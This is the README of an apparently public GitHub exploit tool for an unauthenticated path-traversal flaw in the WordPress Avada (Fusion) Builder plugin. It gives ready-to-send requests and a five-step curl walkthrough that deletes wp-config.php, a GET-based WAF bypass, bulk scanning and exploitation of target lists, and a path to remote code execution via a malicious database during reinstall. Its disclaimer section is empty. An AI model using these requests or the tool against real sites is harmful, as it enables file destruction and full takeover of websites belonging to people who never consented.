shinthink/CVE-2026-8713
GitHub: shinthink/CVE-2026-8713
针对 WordPress Avada Builder 未授权路径遍历导致任意文件删除并升级为 RCE 的漏洞利用与批量检测工具。
Stars: 4 | Forks: 0
CVE-2026-8713 — Avada (Fusion) Builder WordPress Exploit
未授权路径遍历 → 任意文件删除 → 强制重装 → RCE
## 概述
**CVE-2026-8713** 是 WordPress 的 **Avada (Fusion) Builder** 插件/主题中一个 CVSS 9.1 严重漏洞。`Fusion_Form_DB_Entries` 类中的 `maybe_delete_files()` 函数通过简单的字符串替换,利用由攻击者控制的表单条目值来构建文件系统路径,并且没有进行 `realpath()` 验证或目录包含检查。
未经身份验证的攻击者通过 `fusion_form_submit_ajax` handler 提交路径遍历 payload。当 `Fusion_Form_DB_Privacy` 的 shutdown hook 处理带有 `privacy_expiration_action=delete` 的条目时,目标文件就会从服务器上被删除。
### 受影响版本
| Version | Status |
|---|---|
| Fusion Builder ≤ 3.15.3 | 存在漏洞 |
| Fusion Builder ≥ 3.15.4 | 已修复 |
| Avada theme (all) | 内置插件可能存在漏洞 |
## 漏洞机制
### 根本原因
在 `fusion-builder/inc/class-fusion-form-db-entries.php` 中,`maybe_delete_files()` 方法使用字符串替换来解析文件路径,且没有进行包含验证:
```
$file_path = str_replace($upload['url'], $upload['path'], $value);
// No realpath() check — path traversal sequences pass through
unlink($file_path);
```
### 攻击链
```
1. Attacker submits Avada form via wp_ajax_nopriv_fusion_form_submit_ajax
→ Path traversal: ../../wp-config.php
→ privacy_expiration_action = delete
→ privacy_expiration_interval = 0
2. WordPress shutdown hook fires Fusion_Form_DB_Privacy
→ Processes stored form entry
→ Calls maybe_delete_files() on attacker-controlled path
→ wp-config.php deleted
3. WordPress enters setup/install mode
→ Attacker connects site to malicious database
→ Full remote code execution
```
### 未授权访问
AJAX handler 使用 `wp_ajax_nopriv_` 注册,使得未经身份验证的用户也可以访问它:
```
POST /wp-admin/admin-ajax.php
action=fusion_form_submit_ajax
form_id=
privacy_expiration_action=delete
fusion_privacy_expiration_interval=0
fusion_form_field_=../../wp-config.php
```
### WAF Bypass
许多主机屏蔽了发往 `/wp-admin/admin-ajax.php` 的 POST 请求。WordPress 在此 endpoint 上接受通过 GET 传递的参数,从而提供了一个简单的绕过方法:
```
GET /wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=&privacy_expiration_action=delete&...
```
## 安装
```
git clone https://github.com/shinthink/CVE-2026-8713.git
cd CVE-2026-8713
pip install -r requirements.txt
```
## 使用说明
```
# 仅检测(默认 — 不删除文件)
python cve_2026_8713.py -t target.com
# Mass detection
python cve_2026_8713.py -f targets.txt
# Exploit 模式 — 删除 wp-config.php
python cve_2026_8713.py -t target.com --exploit
# 删除自定义文件
python cve_2026_8713.py -t target.com --exploit --delete "../../../debug.log"
```
### 参数
```
-t, --target Single target (domain or IP)
-f, --file Target list, one per line
--exploit Enable file deletion (default: detection only)
--delete PATH Custom file path to delete (default: wp-config.php)
-o, --output Save results to file
--threads Workers (default: 20)
-v, --verbose Show detailed output
```
## 概念验证
### 检测模式
```
$ python cve_2026_8713.py -f targets.txt
```
```
CVE-2026-8713 Avada (Fusion) Builder | CVSS 9.1
Mode: Detection | Targets: 521 | Workers: 20
───────────────────────────────────────────────────────
[EXPLOIT] target-vuln.com 1.2s form #3 (AJAX open)
[VULN] target-waf.com 2.1s form #1 (WAF blocked)
[AVADA] target-noform.com 0.5s (no form found)
[-] target-noavada.com 0.3s
───────────────────────────────────────────────────────
Scan complete | Time: 45s
───────────────────────────────────────────────────────
Targets : 521
Avada detected : 47
Forms found : 12
Vulnerable : 9
```
### Exploit 模式
```
$ python cve_2026_8713.py -t target.com --exploit -v
```
```
CVE-2026-8713 — Avada Builder Exploit
CVSS 9.1 | Pre-Auth | Path Traversal → File Delete → RCE
[+] Found Avada form: id=3
[+] POST form_id=3: HTTP 403 (WAF blocked)
[+] GET form_id=3: HTTP 200 (WAF bypassed)
Host : target.com
Avada : YES
Form : 3
Deleted : wp-config.php (force reinstall → RCE)
Time : 3.2s
```
### 手动利用
**步骤 1 — 验证 Avada**
```
curl -sk 'https://target.com/wp-content/themes/Avada/style.css' | head -5
```
**步骤 2 — 查找 form ID**
```
curl -sk 'https://target.com/' | grep -oP 'fusion-form[^"]*form-id=["\x27](\d+)'
```
**步骤 3 — 提交带有路径遍历的表单**
```
curl -sk -X POST \
-d 'action=fusion_form_submit_ajax' \
-d 'form_id=3' \
-d 'privacy_expiration_action=delete' \
-d 'fusion_privacy_expiration_interval=0' \
-d 'fusion_form_field_x=../../wp-config.php' \
'https://target.com/wp-admin/admin-ajax.php'
```
**步骤 4 — WAF Bypass(如果 POST 被屏蔽)**
```
curl -sk 'https://target.com/wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=3&privacy_expiration_action=delete&fusion_privacy_expiration_interval=0&fusion_form_field_x=../../wp-config.php'
```
**步骤 5 — 验证并利用 RCE**
```
# 站点处于安装模式?
curl -sk -o /dev/null -w '%{http_code}' 'https://target.com/wp-admin/install.php'
# HTTP 200 → wp-config 已删除 → 连接恶意 DB → 完全 RCE
```
## 免责声明
## 参考资源
| Resource | Link |
|---|---|
| IONIX Advisory | [ionix.io/threat-center/cve-2026-8713](https://www.ionix.io/threat-center/cve-2026-8713/) |
| Wordfence Advisory | [wordfence.com](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fusion-builder/avada-fusion-builder-3153-unauthenticated-arbitrary-file-deletion) |
| Patchstack | [patchstack.com](https://patchstack.com/database/wordpress/plugin/fusion-builder/) |
| NVD Entry | [CVE-2026-8713](https://nvd.nist.gov/vuln/detail/CVE-2026-8713) |
本项目与 ThemeFusion 或 Avada 无关。
标签:CISA项目, Python, RCE, Web安全, WordPress, 安全, 无后门, 无服务器架构, 网络信息收集, 蓝队分析, 超时处理, 逆向工具